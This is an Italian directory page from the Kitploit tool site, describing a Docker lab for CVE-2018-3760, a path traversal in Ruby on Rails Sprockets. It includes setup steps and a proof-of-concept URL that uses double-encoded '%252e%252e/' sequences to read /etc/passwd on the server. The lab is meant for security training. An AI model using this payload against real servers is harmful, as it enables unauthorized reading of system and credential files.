Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- — Laboratorio basato su Docker che dimostra la path traversal CVE-2018-3760 in Ruby on Rails Sprockets, con POC e configurazione dell'ambiente per test di sicurezza e formazione. | Kitploit
Strumenti/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebApprendimento e FormazioneLab e Pratica
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

Laboratorio basato su Docker che dimostra la path traversal CVE-2018-3760 in Ruby on Rails Sprockets, con POC e configurazione dell'ambiente per test di sicurezza e formazione.

Vedi Repository
316 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità di Path Traversal in Ruby On Rails (CVE-2018-3760)

Versione cinese

Ruby On Rails è un noto framework di sviluppo Web in Ruby, che utilizza Sprockets come server di file statici in ambiente di sviluppo. Sprockets è una libreria Ruby che compila e distribuisce file di risorse statiche.

Nelle versioni di Sprockets 3.7.1 e precedenti è presente una vulnerabilità di path traversal causata da una doppia decodifica. Un attaccante può utilizzare %252e%252e/ per accedere alla directory root e leggere o eseguire qualsiasi file sul server di destinazione.

Link di riferimento:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

Configurazione dell'ambiente

Esegui il seguente comando:

root@kitploit:~
docker-compose up -d

Visita http://your-ip:3000 e vedrai la pagina di benvenuto.

POC

Visitando direttamente http://your-ip:3000/assets/file:%2f%2f/etc/passwd verrà restituito un errore, poiché il file /etc/passwd non si trova nella directory consentita.

Dalla pagina di errore possiamo ottenere un elenco delle directory consentite. Basta selezionarne una, ad esempio /usr/src/blog/app/assets/images, quindi usare %252e%252e/ per saltare alla directory padre e infine leggere il file /etc/passwd:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

Scarica lo strumento